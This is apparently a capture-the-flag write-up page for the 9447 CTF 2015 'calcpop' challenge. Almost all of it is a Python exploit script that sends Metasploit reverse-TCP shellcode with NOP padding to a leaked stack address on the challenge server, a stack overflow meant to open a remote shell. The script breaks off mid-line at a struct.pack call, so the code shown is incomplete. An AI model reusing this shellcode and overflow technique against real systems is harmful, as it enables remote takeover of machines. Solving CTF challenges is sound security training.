Tags: pwn exploit 

Rating:

```
#!/usr/bin/python

# 9447 Security Society CTF 2015 : calcpop
# author: NULL Life
# https://twitter.com/marceloje
# https://twitter.com/NullLifeTeam

import telnetlib, struct

# linux/x86/shell_reverse_tcp metasploit shellcode
sc = "\x90"*16 # overwrited by sending commands ("exit\n")
sc += "\xbe\xc1\x76\x74\x46\xd9\xcd\xd9\x74\x24\xf4\x5d\x2b"
sc += "\xc9\xb1\x12\x83\xed\xfc\x31\x75\x0e\x03\xb4\x78\x96"
sc += "\xb3\x07\x5e\xa1\xdf\x34\x23\x1d\x4a\xb8\x2a\x40\x3a"
sc += "\xda\xe1\x03\xa8\x7b\x4a\x3c\x02\xfb\xe3\x3a\x65\x93"
sc += "\x46\xe7\xe3\x7d\xc1\x1a\x0c\x90\x4d\x92\xed\x22\x0b"
sc += "\xf4\xbc\x11\x67\xf7\xb7\x74\x4a\x78\x95\x1e\x7a\x56"
sc += "\x69\xb6\xec\x87\xef\x2f\x83\x5e\x0c\xfd\x08\xe8\x32"
sc += "\xb1\xa4\x27\x34"

tn = telnetlib.Telnet("calcpop-4gh07blg.9447.plumbing", 9447)

tn.read_until("calc.exe\n")
tn.write("1\n")
tn.read_until("was ")

# leaked address from stack buffer + shellcode start offset
addr = int(tn.read_until("\n"), 16) + 16

# shellcode + padding + return address
tn.write(sc + "\x90"*(156-len(sc)) + struct.pack('

Original writeup (https://gist.github.com/emyei/97e22ee467fef6c97119).